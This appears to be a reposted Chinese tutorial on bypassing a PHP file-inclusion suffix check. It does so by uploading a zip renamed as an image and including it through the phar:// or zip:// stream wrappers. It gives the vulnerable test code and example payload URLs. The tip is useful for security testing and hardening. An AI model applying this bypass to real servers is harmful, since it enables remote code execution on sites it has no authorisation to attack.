包含漏洞 文件类型白名单验证及判断后缀的解决办法
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,$include_file 可控,可以上传文件, 上传后缀限制为jpg,gif,png,包含后缀限制必须为.phpallow_url_include=Off (不考虑远程包含)if ( isset(
千家信息网最后更新 2025年12月01日包含漏洞 文件类型白名单验证及判断后缀的解决办法
$include_file 可控,可以上传文件, 上传后缀限制为jpg,gif,png,包含后缀限制必须为.php
allow_url_include=Off (不考虑远程包含)
if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ) { include_once( $include_file ); }-----------------------------------------------------
解决方案
要求php>=5.3
把php打包成zip,改名上传,比如名为info.zip.jpg
然后用phar流包装器包含,其中info.zip.jpg为zip文件名,info.php为zip压缩包内子文件名
http://localhost/index.php?a=phar://info.zip.jpg/info.php
测试代码:
echo "ini_get(allow_url_include):".ini_get("allow_url_include")."";$include_file=$_GET['a'];if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ){ include_once( $include_file );}else{ echo "file err";}参考文档:http://php.net/manual/zh/phar.using.stream.php
PS.
据php官方文档所述,最少需要php5.3才能使用,5.3之前需要拓展
如果不能用的话,还可以试试zip流包装器(需要zip拓展),注意转义井号:
zip://info.zip.jpg#info.php
文件
后缀
文件名
文档
包装
限制
代码
官方
方案
解决方案
义井
参考
测试
办法
名单
漏洞
类型
验证
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
2022tbc服务器比例
php数据库怎么添加汉字
网络安全数据保护建议
数据库加载物品失败
巴彦淖尔商城分销软件开发费用
t330服务器raid5教程
拱墅区管理软件开发
完善网络安全生态链
王鑫软件开发
汕头蓝海网络技术
申论关于网络安全范文
分布式数据库面向事务的特点
行唐软件开发者在线咨询
金山区电子网络技术费用
计算机网络技术有哪些知识点
软件开发接私活平台
数据库版本低不兼容补丁
网络安全走进乡村课堂
数据库技术兴起于
数据库对号怎么打
服务器 简答题
房山回收二手服务器价钱
服务器管理系统 源码
电力企业是网络安全责任主企业
江苏通信网络安全防护
镇江高防服务器租用
公软件开发报销流程
西安安卓平台软件开发
数据库拷贝表字段
数据库结构设计图是er图吗
